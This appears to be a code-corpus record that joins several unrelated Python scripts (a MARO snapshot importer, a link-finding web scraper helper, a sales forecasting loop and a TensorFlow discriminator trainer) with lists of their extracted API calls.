'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "hoh.values['x']", "hoh.values['y']", "hoh.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], hoh.\n values['x'], hoh.values['y'], hoh.values['z'])\n", (32682, 32789), True, 'import Geometry.GeoCalcs as calcs\n'), ((32945, 33066), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "het.values['x']", "het.values['y']", "het.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], het.\n values['x'], het.values['y'], het.values['z'])\n", (32959, 33066), True, 'import Geometry.GeoCalcs as calcs\n'), ((6560, 6573), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6570, 6573), False, 'import time\n'), ((6836, 6850), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (6846, 6850), False, 'import time\n'), ((9349, 9362), 'Geometry.GeoAtom.GeoAtom', 'atm.GeoAtom', ([], {}), '()\n', (9360, 9362), True, 'import Geometry.GeoAtom as atm\n'), ((20611, 20920), 'Geometry.GeoCalcs.torsion', 'calcs.torsion', (["datasA[0].values['x']", "datasA[0].values['y']", "datasA[0].values['z']", "datasA[1].values['x']", "datasA[1].values['y']", "datasA[1].values['z']", "datasA[2].values['x']", "datasA[2].values['y']", "datasA[2].values['z']", "datasA[3].values['x']", "datasA[3].values['y']", "datasA[3].values['z']"], {}), "(datasA[0].values['x'], datasA[0].values['y'], datasA[0].\n values['z'], datasA[1].values['x'], datasA[1].values['y'], datasA[1].\n values['z'], datasA[2].values['x'], datasA[2].values['y'], datasA[2].\n values['z'], datasA[3].values['x'], datasA[3].values['y'], datasA[3].\n values['z'])\n", (20624, 20920), True, 'import Geometry.GeoCalcs as calcs\n'), ((22886, 23114), 'Geometry.GeoCalcs.angle', 'calcs.angle', (["datasA[0].values['x']", "datasA[0].values['y']", "datasA[0].values['z']", "datasA[1].values['x']", "datasA[1].values['y']", "datasA[1].values['z']", "datasA[2].values['x']", "datasA[2].values['y']", "datasA[2].values['z']"], {}), "(datasA[0].values['x'], datasA[0].values['y'], datasA[0].values[\n 'z'], datasA[1].values['x'], datasA[1].values['y'], datasA[1].values[\n 'z'], datasA[2].values['x'], datasA[2].values['y'], datasA[2].values['z'])\n", (22897, 23114), True, 'import Geometry.GeoCalcs as calcs\n'), ((24736, 24898), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["datasA[0].values['x']", "datasA[0].values['y']", "datasA[0].values['z']", "datasA[1].values['x']", "datasA[1].values['y']", "datasA[1].values['z']"], {}), "(datasA[0].values['x'], datasA[0].values['y'], datasA[0].\n values['z'], datasA[1].values['x'], datasA[1].values['y'], datasA[1].\n values['z'])\n", (24750, 24898), True, 'import Geometry.GeoCalcs as calcs\n')] |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import pickle
from argparse import ArgumentParser
import numpy as np
import yaml
def import_from_snapshot_dump(streamit, folder: str, npy_name: str, meta_name: str, category: str):
"""Import specified category from snapshot dump file into data service.
Args:
streamit (streamit) : Streamit instance.
folder (str): Folder name of snapshot dump file.
npy_name (str): Name of .npy file that hold dumped numpy array data.
meta_name (str): File name of the meta file.
category (str): Category name to save into database.
"""
npy_path = os.path.join(folder, npy_name)
meta_path = os.path.join(folder, meta_name)
# Read meta file to get names and length of each field.
with open(meta_path, "r") as fp:
field_name_list = fp.readline().split(",")
field_length_list = [int(line) for line in fp.readline().split(",")]
instance_list: np.ndarray = np.load(npy_path)
# Instance number will be same for numpy backend.
instance_number = len(instance_list[0])
for tick in range(len(instance_list)):
streamit.tick(tick)
for instance_index in range(instance_number):
field_dict = {}
field_slot_index = 0
for field_index in range(len(field_name_list)):
field_name = field_name_list[field_index].strip()
field_length = field_length_list[field_index]
field_dict["index"] = instance_index
if field_length == 1:
field_dict[field_name] = instance_list[tick][instance_index][field_name].item()
else:
field_dict[field_name] = list(
[v.item() for v in instance_list[tick][instance_index][field_name]]
)
field_slot_index += field_length
streamit.data(category, **field_dict)
return instance_number
def import_port_details(streamit, folder: str):
"""Import port details into database from specified folder.
Args:
streamit (streamit) : Streamit instance.
folder (str): Folder path that contains the port detail file.
"""
port_npy_name = "ports.npy"
port_meta_name = "ports.meta"
category = "port_details"
return import_from_snapshot_dump(streamit, folder, port_npy_name, port_meta_name, category)
def import_vessel_details(streamit, folder: str):
"""Import vessel details into database.
Args:
streamit (streamit) : Streamit instance.
folder (str): Folder path that contains vessel details.
"""
vessels_npy_name = "vessels.npy"
vessels_meta_name = "vessels.meta"
category = "vessel_details"
return import_from_snapshot_dump(streamit, folder, vessels_npy_name, vessels_meta_name, category)
def import_full_on_ports(streamit, data: np.ndarray, port_number: int):
"""Import full_on_ports information into database.
Args:
streamit (streamit) : Streamit instance.
data (numpy.ndarray): Data of full_on_ports.
port_number (int): Number of ports.
"""
for tick in range(len(data)):
streamit.tick(tick)
m = data[tick][0].reshape(port_number, -1)
# We only save cells that value > 0.
a, b = np.where(m > 0)
for from_port_index, to_port_index in list(zip(a, b)):
streamit.data(
"full_on_ports",
from_port_index=from_port_index,
dest_port_index=to_port_index,
quantity=m[from_port_index, to_port_index]
)
def import_full_on_vessels(streamit, data: np.ndarray, port_number: int, vessel_number: int):
"""Import full_on_vessels data into database.
Args:
streamit (streamit) : Streamit instance.
data (numpy.ndarray): Data that contains full_on_vessels matrix.
port_number (int): Number of ports.
vessel_number (int): Number of vessels.
"""
for tick in range(len(data)):
streamit.tick(tick)
m = data[tick][0].reshape(vessel_number, port_number)
a, b = np.where(m > 0)
for vessel_index, port_index in list(zip(a, b)):
streamit.data(
"full_on_vessels",
vessel_index=vessel_index,
port_index=port_index,
quantity=m[vessel_index, port_index]
)
def import_vessel_plans(streamit, data: np.ndarray, port_number: int, vessel_number: int):
"""Import vessel_plans matrix into database.
Args:
streamit (streamit) : Streamit instance.
data (numpy.ndarray): Data that contains vessel_plans matrix.
port_number (int): Number of ports.
vessel_number (int): Number of vessels.
"""
for tick in range(len(data)):
streamit.tick(tick)
m = data[tick][0].reshape(vessel_number, port_number)
a, b = np.where(m > -1)
for vessel_index, port_index in list(zip(a, b)):
streamit.data(
"vessel_plans",
vessel_index=vessel_index,
port_index=port_index,
planed_arrival_tick=m[vessel_index, port_index]
)
def import_metrics(streamit, epoch_full_path: str, port_number: int, vessel_number: int):
"""Import matrix into database.
Args:
streamit (streamit) : Streamit instance.
epoch_full_path (str): Path that for target epoch.
port_number (int): Number of ports.
vessel_number (int): Number of vessels.
"""
matrics_path = os.path.join(epoch_full_path, "matrices.npy")
matrics = np.load(matrics_path)
import_full_on_ports(streamit, matrics["full_on_ports"], port_number)
import_full_on_vessels(streamit, matrics["full_on_vessels"], port_number, vessel_number)
import_vessel_plans(streamit, matrics["vessel_plans"], port_number, vessel_number)
def import_attention(streamit, atts_path: str):
"""Import attaention data.
Args:
streamit (streamit) : Streamit instance.
atts_path (str): Path to attention file.
"""
with open(atts_path, "rb") as fp:
attentions = pickle.load(fp)
attention_index = -1
# List of tuple (tick, attention dict contains:"p2p", "p2v", "v2p").
for tick, attention in attentions:
attention_index += 1
tick = int(tick)
streamit.tick(tick)
streamit.complex("attentions", attention)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--name", required=True,
help="Experiment name show in databas")
parser.add_argument("--scenario", required=True,
help="Scenario name of import experiment")
parser.add_argument("--topology", required=True,
help="Topology of target scenario")
parser.add_argument("--durations", required=True,
type=int, help="Durations of each episode")
parser.add_argument("--episodes", required=True, type=int,
help="Total episode of this experiment")
parser.add_argument("--dir", required=True,
help="Root folder of dump files")
parser.add_argument(
"--ssdir", help="Folder that contains snapshots data that with epoch_x sub-folders")
parser.add_argument("--host", default="127.0.0.1",
help="Host of questdb server")
args = parser.parse_args()
assert (os.path.exists(args.dir))
assert (os.path.exists(args.ssdir))
# Force enable streamit.
os.environ["MARO_STREAMIT_ENABLED"] = "true"
os.environ["MARO_STREAMIT_EXPERIMENT_NAME"] = args.name
from maro.streamit import streamit
with streamit:
# experiment name
with open(os.path.join(args.dir, "config.yml"), "r") as fp:
config = yaml.safe_load(fp)
# streamit.info(args.scenario, args.topology, args.durations, args.episodes)
streamit.complex("config", config)
for episode in range(args.episodes):
epoch_folder = f"epoch_{episode}"
epoch_full_path = os.path.join(args.ssdir, epoch_folder)
# ensure epoch folder exist
if os.path.exists(epoch_full_path):
streamit.episode(episode)
# import for each category
port_number = import_port_details(streamit, epoch_full_path)
vessel_number = import_vessel_details(streamit, epoch_full_path)
import_metrics(streamit, epoch_full_path, port_number, vessel_number)
# NOTE: we only have one attention file for now, so hard coded here
streamit.episode(0)
import_attention(streamit, os.path.join(args.dir, "atts_1"))
| [
"numpy.load",
"argparse.ArgumentParser",
"maro.streamit.streamit.episode",
"maro.streamit.streamit.data",
"maro.streamit.streamit.complex",
"os.path.exists",
"maro.streamit.streamit.tick",
"numpy.where",
"pickle.load",
"yaml.safe_load",
"os.path.join"
] | [((675, 705), 'os.path.join', 'os.path.join', (['folder', 'npy_name'], {}), '(folder, npy_name)\n', (687, 705), False, 'import os\n'), ((722, 753), 'os.path.join', 'os.path.join', (['folder', 'meta_name'], {}), '(folder, meta_name)\n', (734, 753), False, 'import os\n'), ((1013, 1030), 'numpy.load', 'np.load', (['npy_path'], {}), '(npy_path)\n', (1020, 1030), True, 'import numpy as np\n'), ((5657, 5702), 'os.path.join', 'os.path.join', (['epoch_full_path', '"""matrices.npy"""'], {}), "(epoch_full_path, 'matrices.npy')\n", (5669, 5702), False, 'import os\n'), ((5718, 5739), 'numpy.load', 'np.load', (['matrics_path'], {}), '(matrics_path)\n', (5725, 5739), True, 'import numpy as np\n'), ((6584, 6600), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (6598, 6600), False, 'from argparse import ArgumentParser\n'), ((7579, 7603), 'os.path.exists', 'os.path.exists', (['args.dir'], {}), '(args.dir)\n', (7593, 7603), False, 'import os\n'), ((7617, 7643), 'os.path.exists', 'os.path.exists', (['args.ssdir'], {}), '(args.ssdir)\n', (7631, 7643), False, 'import os\n'), ((1182, 1201), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (1195, 1201), False, 'from maro.streamit import streamit\n'), ((3237, 3256), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (3250, 3256), False, 'from maro.streamit import streamit\n'), ((3370, 3385), 'numpy.where', 'np.where', (['(m > 0)'], {}), '(m > 0)\n', (3378, 3385), True, 'import numpy as np\n'), ((4100, 4119), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (4113, 4119), False, 'from maro.streamit import streamit\n'), ((4199, 4214), 'numpy.where', 'np.where', (['(m > 0)'], {}), '(m > 0)\n', (4207, 4214), True, 'import numpy as np\n'), ((4898, 4917), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (4911, 4917), False, 'from maro.streamit import streamit\n'), ((4997, 5013), 'numpy.where', 'np.where', (['(m > -1)'], {}), '(m > -1)\n', (5005, 5013), True, 'import numpy as np\n'), ((6252, 6267), 'pickle.load', 'pickle.load', (['fp'], {}), '(fp)\n', (6263, 6267), False, 'import pickle\n'), ((6471, 6490), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (6484, 6490), False, 'from maro.streamit import streamit\n'), ((6500, 6541), 'maro.streamit.streamit.complex', 'streamit.complex', (['"""attentions"""', 'attention'], {}), "('attentions', attention)\n", (6516, 6541), False, 'from maro.streamit import streamit\n'), ((8072, 8106), 'maro.streamit.streamit.complex', 'streamit.complex', (['"""config"""', 'config'], {}), "('config', config)\n", (8088, 8106), False, 'from maro.streamit import streamit\n'), ((8775, 8794), 'maro.streamit.streamit.episode', 'streamit.episode', (['(0)'], {}), '(0)\n', (8791, 8794), False, 'from maro.streamit import streamit\n'), ((1951, 1988), 'maro.streamit.streamit.data', 'streamit.data', (['category'], {}), '(category, **field_dict)\n', (1964, 1988), False, 'from maro.streamit import streamit\n'), ((3462, 3604), 'maro.streamit.streamit.data', 'streamit.data', (['"""full_on_ports"""'], {'from_port_index': 'from_port_index', 'dest_port_index': 'to_port_index', 'quantity': 'm[from_port_index, to_port_index]'}), "('full_on_ports', from_port_index=from_port_index,\n dest_port_index=to_port_index, quantity=m[from_port_index, to_port_index])\n", (3475, 3604), False, 'from maro.streamit import streamit\n'), ((4285, 4410), 'maro.streamit.streamit.data', 'streamit.data', (['"""full_on_vessels"""'], {'vessel_index': 'vessel_index', 'port_index': 'port_index', 'quantity': 'm[vessel_index, port_index]'}), "('full_on_vessels', vessel_index=vessel_index, port_index=\n port_index, quantity=m[vessel_index, port_index])\n", (4298, 4410), False, 'from maro.streamit import streamit\n'), ((5084, 5217), 'maro.streamit.streamit.data', 'streamit.data', (['"""vessel_plans"""'], {'vessel_index': 'vessel_index', 'port_index': 'port_index', 'planed_arrival_tick': 'm[vessel_index, port_index]'}), "('vessel_plans', vessel_index=vessel_index, port_index=\n port_index, planed_arrival_tick=m[vessel_index, port_index])\n", (5097, 5217), False, 'from maro.streamit import streamit\n'), ((7959, 7977), 'yaml.safe_load', 'yaml.safe_load', (['fp'], {}), '(fp)\n', (7973, 7977), False, 'import yaml\n'), ((8230, 8268), 'os.path.join', 'os.path.join', (['args.ssdir', 'epoch_folder'], {}), '(args.ssdir, epoch_folder)\n', (8242, 8268), False, 'import os\n'), ((8325, 8356), 'os.path.exists', 'os.path.exists', (['epoch_full_path'], {}), '(epoch_full_path)\n', (8339, 8356), False, 'import os\n'), ((8830, 8862), 'os.path.join', 'os.path.join', (['args.dir', '"""atts_1"""'], {}), "(args.dir, 'atts_1')\n", (8842, 8862), False, 'import os\n'), ((7888, 7924), 'os.path.join', 'os.path.join', (['args.dir', '"""config.yml"""'], {}), "(args.dir, 'config.yml')\n", (7900, 7924), False, 'import os\n'), ((8374, 8399), 'maro.streamit.streamit.episode', 'streamit.episode', (['episode'], {}), '(episode)\n', (8390, 8399), False, 'from maro.streamit import streamit\n')] |
import jellyfish
import math
import numpy as np
from bs4 import BeautifulSoup
import requests
import threading
import re
from . import YDHP_SiteInfo, YDHP_ScrapySystem
class NextPage:
def __init__(self, html, site_info):
self.m_html = html
self.m_site_info = site_info
def next_page(self):
"""
§ Find all the links hidden inside html
§ Remove duplicated and fetched uris
§ jaro distance between these uris and the example uri
§ Find the mean distance
§ Select uris that distance < mean distance
@:return list of urls that might be possible for next page(s)
"""
possible_uris = self.find_a_href_tags()
possible_uris = list(set(possible_uris))
for fetched_url in self.m_site_info.fetched_urls:
try:
possible_uris.remove(fetched_url)
except:
pass
re_possible_dicts_list = list()
threads = []
for target in possible_uris:
threads.append(threading.Thread(target=self.jaro_distance(target, re_possible_dicts_list)))
[thread.start() for thread in threads]
[thread.join() for thread in threads]
average_distance = self.avge_distance(re_possible_dicts_list)
threads = list()
for target in re_possible_dicts_list:
threads.append(threading.Thread(target=self.remove_large_distance_target, args=(average_distance, target, re_possible_dicts_list)))
[thread.start() for thread in threads]
[thread.join() for thread in threads]
next_uris = list()
[next_uris.append(possible_dict['target']) for possible_dict in re_possible_dicts_list]
return next_uris
def remove_large_distance_target(self, average_distance, target, re_possible_dicts_list):
if target['distance'] >= average_distance: re_possible_dicts_list.remove(target)
def avge_distance(self, possible_dicts_list):
distances = list()
for possible_dict in possible_dicts_list:
distances.append(possible_dict['distance'])
return np.average(distances)
def jaro_distance(self, target, re_possible_dicts_list):
possible_dict = {
'target': target
,'distance': float(jellyfish.jaro_distance(self.m_site_info.start_url, target))
}
re_possible_dicts_list.append(possible_dict)
def find_a_href_tags(self):
bs_obj = BeautifulSoup(self.m_html, 'lxml')
targets = []
for target in bs_obj.findAll("a"):
if 'href' in target.attrs:
targets.append(target.attrs['href'])
return targets
| [
"bs4.BeautifulSoup",
"threading.Thread",
"jellyfish.jaro_distance",
"numpy.average"
] | [((2125, 2146), 'numpy.average', 'np.average', (['distances'], {}), '(distances)\n', (2135, 2146), True, 'import numpy as np\n'), ((2490, 2524), 'bs4.BeautifulSoup', 'BeautifulSoup', (['self.m_html', '"""lxml"""'], {}), "(self.m_html, 'lxml')\n", (2503, 2524), False, 'from bs4 import BeautifulSoup\n'), ((1382, 1502), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.remove_large_distance_target', 'args': '(average_distance, target, re_possible_dicts_list)'}), '(target=self.remove_large_distance_target, args=(\n average_distance, target, re_possible_dicts_list))\n', (1398, 1502), False, 'import threading\n'), ((2308, 2367), 'jellyfish.jaro_distance', 'jellyfish.jaro_distance', (['self.m_site_info.start_url', 'target'], {}), '(self.m_site_info.start_url, target)\n', (2331, 2367), False, 'import jellyfish\n')] |
import sys
import numpy as np
import pandas as pd
import csv
import os
import ast
import logging
from paths import *
from data.etl import etl, over_sample
from models import train_model, predict_model
from pathlib import Path
# logger config
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
fh = logging.FileHandler(log_path / 'log_group.log')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
ch.setFormatter(formatter)
fh.setFormatter(formatter)
logger.addHandler(ch)
logger.addHandler(fh)
# group-level params
level = 'group' # group or item level
ind = 1942 #1913 to create validation forecast
run = 'no' #whether or not to run SMOTE
def create_csv(path):
if os.path.exists(path):
print(path, " already exists")
df = pd.read_csv(path, names=['val1','val2'])
return df
else:
with open(path, "w") as empty:
pass
df = pd.read_csv(path, names=['val1','val2'])
return df
# sales data set, extend to include d_1942 - d_1969
sales_master = pd.read_csv(data_path / 'raw/sales_train_evaluation.csv')
seq = np.arange(1942,1970,1)
for i in seq:
col = ('d_'+ str(i))
sales_master[col] = 0
# read calendar, sell_price datasets
calendar = pd.read_csv(data_path / 'raw/calendar.csv')
calendar.drop(columns=['date','weekday'], inplace=True)
sell = pd.read_csv(data_path / 'raw/sell_prices.csv')
# stratification
list_of_segments = [
['state_id'],
['state_id','store_id'],
['state_id','store_id', 'cat_id'],
['state_id','store_id', 'cat_id', 'dept_id']
]
# let's loop through the list_of_segments
# this will create forecasts for all combinations at each of the 4 levels
for i in range(len(list_of_segments)):
seg_list = list_of_segments[i]
# create repective csv file for appending to later
params_path = model_path / str("_".join(seg_list) + '_best_params.csv')
forecast_path = data_path / 'processed' / str("_".join(seg_list) + '_forecast.csv')
# create csv files
successful = create_csv(forecast_path)
best_params = create_csv(params_path)
# unique combination of values based on stratification
length = len(seg_list) # this wil drive the number of filter statements below
uniq_df = sales_master[seg_list].drop_duplicates()
# iterate through rows in uniq_df
for i in range(len(uniq_df)):
# string is for the dynamic filter statement, segment is specific combination to train
string = []
segment = []
for j in range(length):
# dynamic filter statement
add = "(sales_master." + seg_list[j] + " == '" + uniq_df.iloc[i,j] + "')"
string.append(add)
# segment
seg = uniq_df.iloc[i,j]
segment.append(seg)
# use "&" to join the filter statements in "string" list, filter sales_master
final_string = "&".join(string)
id_list = sales_master[eval(final_string)].id.to_list()
# now that we've identified the id's that fall into this segment
# let's transform the data, train, and create forecasts
x = str("_".join(segment))
logger.debug('RUNNING SEGMENT {}'.format(x))
logger.debug('Filter statement for {} is {}'.format(x, final_string))
# check to see if best model parameters exist
if ((os.path.getsize(params_path) > 0) & (best_params.val1==x).any()):
logger.debug("Best parameters for {} already exists".format(x))
# check to see if forecast already exists
if ((os.path.getsize(forecast_path) > 0) & (successful.val1==x).any()):
logger.debug("Forecast for {} already exists".format(x))
else:
# grab best model params
model_params = best_params[best_params.val1==x].val2.to_dict()
key, params = model_params.popitem()
# perform data transformations
merge_df, etl_df = etl(sales_master, calendar, sell, id_list, level, ind)
X, y = over_sample(etl_df, run)
logger.debug("Creating forecast for {} segment".format("_".join(segment)))
forecast = predict_lgb(X, y, merge_df, ast.literal_eval(params), ind)
row_contents = ["_".join(segment), str(forecast)]
with open(forecast_path, 'a') as fd:
wr = csv.writer(fd)
wr.writerow(row_contents)
else:
# train and create forecast
logger.debug("Transforming data for {} segment".format(x))
merge_df, etl_df = etl(sales_master, calendar, sell, id_list, level, ind)
X, y = over_sample(etl_df, run)
logger.debug("Training for {} segment".format(x))
params = train_lgb(X, y)
# append best parameter results
row_contents = ["_".join(segment), str(params)]
with open(params_path, 'a') as fd:
wr = csv.writer(fd)
wr.writerow(row_contents)
logger.debug("Creating forecast for {} segment".format(x))
forecast = predict_lgb(X, y, merge_df, params, ind)
row_contents = ["_".join(segment), str(forecast)]
with open(forecast_path, 'a') as fd:
wr = csv.writer(fd)
wr.writerow(row_contents) | [
"ast.literal_eval",
"logging.FileHandler",
"csv.writer",
"pandas.read_csv",
"os.path.getsize",
"logging.StreamHandler",
"os.path.exists",
"data.etl.etl",
"logging.Formatter",
"numpy.arange",
"data.etl.over_sample",
"logging.getLogger"
] | [((252, 279), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (269, 279), False, 'import logging\n'), ((317, 340), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (338, 340), False, 'import logging\n'), ((374, 421), 'logging.FileHandler', 'logging.FileHandler', (["(log_path / 'log_group.log')"], {}), "(log_path / 'log_group.log')\n", (393, 421), False, 'import logging\n'), ((462, 568), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""'], {'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n", (479, 568), False, 'import logging\n'), ((1180, 1237), 'pandas.read_csv', 'pd.read_csv', (["(data_path / 'raw/sales_train_evaluation.csv')"], {}), "(data_path / 'raw/sales_train_evaluation.csv')\n", (1191, 1237), True, 'import pandas as pd\n'), ((1245, 1269), 'numpy.arange', 'np.arange', (['(1942)', '(1970)', '(1)'], {}), '(1942, 1970, 1)\n', (1254, 1269), True, 'import numpy as np\n'), ((1382, 1425), 'pandas.read_csv', 'pd.read_csv', (["(data_path / 'raw/calendar.csv')"], {}), "(data_path / 'raw/calendar.csv')\n", (1393, 1425), True, 'import pandas as pd\n'), ((1489, 1535), 'pandas.read_csv', 'pd.read_csv', (["(data_path / 'raw/sell_prices.csv')"], {}), "(data_path / 'raw/sell_prices.csv')\n", (1500, 1535), True, 'import pandas as pd\n'), ((841, 861), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (855, 861), False, 'import os\n'), ((915, 956), 'pandas.read_csv', 'pd.read_csv', (['path'], {'names': "['val1', 'val2']"}), "(path, names=['val1', 'val2'])\n", (926, 956), True, 'import pandas as pd\n'), ((1053, 1094), 'pandas.read_csv', 'pd.read_csv', (['path'], {'names': "['val1', 'val2']"}), "(path, names=['val1', 'val2'])\n", (1064, 1094), True, 'import pandas as pd\n'), ((4788, 4842), 'data.etl.etl', 'etl', (['sales_master', 'calendar', 'sell', 'id_list', 'level', 'ind'], {}), '(sales_master, calendar, sell, id_list, level, ind)\n', (4791, 4842), False, 'from data.etl import etl, over_sample\n'), ((4862, 4886), 'data.etl.over_sample', 'over_sample', (['etl_df', 'run'], {}), '(etl_df, run)\n', (4873, 4886), False, 'from data.etl import etl, over_sample\n'), ((3495, 3523), 'os.path.getsize', 'os.path.getsize', (['params_path'], {}), '(params_path)\n', (3510, 3523), False, 'import os\n'), ((4136, 4190), 'data.etl.etl', 'etl', (['sales_master', 'calendar', 'sell', 'id_list', 'level', 'ind'], {}), '(sales_master, calendar, sell, id_list, level, ind)\n', (4139, 4190), False, 'from data.etl import etl, over_sample\n'), ((4214, 4238), 'data.etl.over_sample', 'over_sample', (['etl_df', 'run'], {}), '(etl_df, run)\n', (4225, 4238), False, 'from data.etl import etl, over_sample\n'), ((5160, 5174), 'csv.writer', 'csv.writer', (['fd'], {}), '(fd)\n', (5170, 5174), False, 'import csv\n'), ((5486, 5500), 'csv.writer', 'csv.writer', (['fd'], {}), '(fd)\n', (5496, 5500), False, 'import csv\n'), ((3721, 3751), 'os.path.getsize', 'os.path.getsize', (['forecast_path'], {}), '(forecast_path)\n', (3736, 3751), False, 'import os\n'), ((4386, 4410), 'ast.literal_eval', 'ast.literal_eval', (['params'], {}), '(params)\n', (4402, 4410), False, 'import ast\n'), ((4562, 4576), 'csv.writer', 'csv.writer', (['fd'], {}), '(fd)\n', (4572, 4576), False, 'import csv\n')] |
import sys,json,math
sys.path.insert(0, "/Users/tom/Dropbox/msc-ml/project/src/")
sys.path.insert(0, "/cs/student/msc/ml/2017/thosking/dev/msc-project/src/")
sys.path.insert(0, "/home/thosking/msc-project/src/")
import tensorflow as tf
import numpy as np
from instance import DiscriminatorInstance
import helpers.loader as loader
from tqdm import tqdm
def main(_):
FLAGS = tf.app.flags.FLAGS
# results=results[:32]
# dev_ctxts, dev_qs,dev_ans,dev_ans_pos, dev_correct = zip(*squad_dev)
positive_data=[]
negative_data=[]
if FLAGS.disc_trainongenerated is True:
with open(FLAGS.log_dir+'out_eval_'+ FLAGS.disc_modelslug +'.json') as f:
results = json.load(f)
# for res in results:
# qpred,qgold,ctxt,ans_text,ans_pos =res
for res in results['results']:
positive_data.append( (res['c'], res['q_gold'], res['a_text'], res['a_pos']) )
negative_data.append( (res['c'], res['q_pred'], res['a_text'], res['a_pos']) )
if FLAGS.disc_trainonsquad is True:
squad_v2 = loader.load_squad_triples(FLAGS.data_path, FLAGS.disc_dev_set, v2=True)
for res in squad_v2:
ctxt,q,ans_text,ans_pos,label =res
if label is False: # label is "is_unanswerable"
positive_data.append( (ctxt.lower(), q.lower(), ans_text.lower(), ans_pos) )
else:
negative_data.append( (ctxt.lower(), q.lower(), ans_text.lower(), ans_pos) )
num_instances = min(len(negative_data), len(positive_data))
disc = DiscriminatorInstance(path=(FLAGS.model_dir+'saved/qanet2/' if FLAGS.disc_init_qanet is True else None), trainable=True, log_slug=FLAGS.disc_modelslug+("_SQUAD" if FLAGS.disc_trainonsquad else "")+("_QAINIT" if FLAGS.disc_init_qanet else ""), force_init=FLAGS.disc_init_qanet)
# disc.load_from_chkpt() # this loads the embeddings etc
train_samples = math.floor(0.8*num_instances)
dev_samples = math.floor(0.2*num_instances)
positive_data_train = positive_data[:train_samples]
negative_data_train = negative_data[:train_samples]
positive_data_dev = positive_data[train_samples:]
negative_data_dev = negative_data[train_samples:]
num_steps_train = train_samples//FLAGS.batch_size
num_steps_dev = dev_samples//FLAGS.batch_size
num_steps_squad = num_steps_dev
best_oos_nll=1e6
for i in tqdm(range(num_steps_train*FLAGS.disc_num_epochs), desc='Training'):
if i % num_steps_train ==0:
np.random.shuffle(positive_data_train)
np.random.shuffle(negative_data_train)
ixs = np.round(np.random.binomial(1,0.5,FLAGS.batch_size))
# batch = train_data[i*FLAGS.batch_size:(i+1)*FLAGS.batch_size]
batch = [negative_data_train[(i% num_steps_train)*FLAGS.batch_size+j] if ix < 0.5 else positive_data_train[(i% num_steps_train)*FLAGS.batch_size+j] for j,ix in enumerate(ixs.tolist())]
ctxt,qbatch,ans_text,ans_pos = zip(*batch)
# print(ixs)
# print(qbatch)
# print(ans_text)
# print(ans_pos)
# print(ctxt)
# exit()
# +qpred[ix].replace("</Sent>","").replace("<PAD>","")
qbatch = [q.replace(" </Sent>","").replace(" <PAD>","") for q in qbatch]
# qbatch = ["fake " if ixs[ix] < 0.5 else "real " for ix in range(FLAGS.batch_size)]
# print(qbatch, ixs)
loss = disc.train_step(ctxt, qbatch, ans_text, ans_pos, ixs, (i))
if i % 1000 == 0 and i >0:
dev_acc=[]
dev_nll=[]
for dev_i in tqdm(range(num_steps_dev), desc='Step '+str(i) + " dev"):
ixs = np.round(np.random.binomial(1,0.5,FLAGS.batch_size))
batch = [negative_data_dev[dev_i*FLAGS.batch_size+j] if ix < 0.5 else positive_data_dev[dev_i*FLAGS.batch_size+j] for j,ix in enumerate(ixs.tolist())]
ctxt,qbatch,ans_text,ans_pos = zip(*batch)
qbatch = [q.replace(" </Sent>","").replace(" <PAD>","") for q in qbatch]
pred = disc.get_pred(ctxt, qbatch, ans_text, ans_pos)
nll = disc.get_nll(ctxt, qbatch, ans_text, ans_pos, ixs)
acc = 1.0*np.equal(np.round(pred), ixs)
dev_acc.extend(acc.tolist())
dev_nll.extend(nll.tolist())
accsummary = tf.Summary(value=[tf.Summary.Value(tag="dev_perf/acc",
simple_value=np.mean(dev_acc))])
nllsummary = tf.Summary(value=[tf.Summary.Value(tag="dev_perf/nll",
simple_value=np.mean(dev_nll))])
disc.summary_writer.add_summary(accsummary, global_step=i)
disc.summary_writer.add_summary(nllsummary, global_step=i)
print(np.mean(dev_acc))
if np.mean(dev_nll) < best_oos_nll:
best_oos_nll=np.mean(dev_nll)
disc.save_to_chkpt(FLAGS.model_dir, i)
print("New best NLL, saving")
if __name__ == "__main__":
tf.app.run()
| [
"json.load",
"numpy.random.binomial",
"numpy.round",
"math.floor",
"sys.path.insert",
"numpy.mean",
"helpers.loader.load_squad_triples",
"instance.DiscriminatorInstance",
"tensorflow.app.run",
"numpy.random.shuffle"
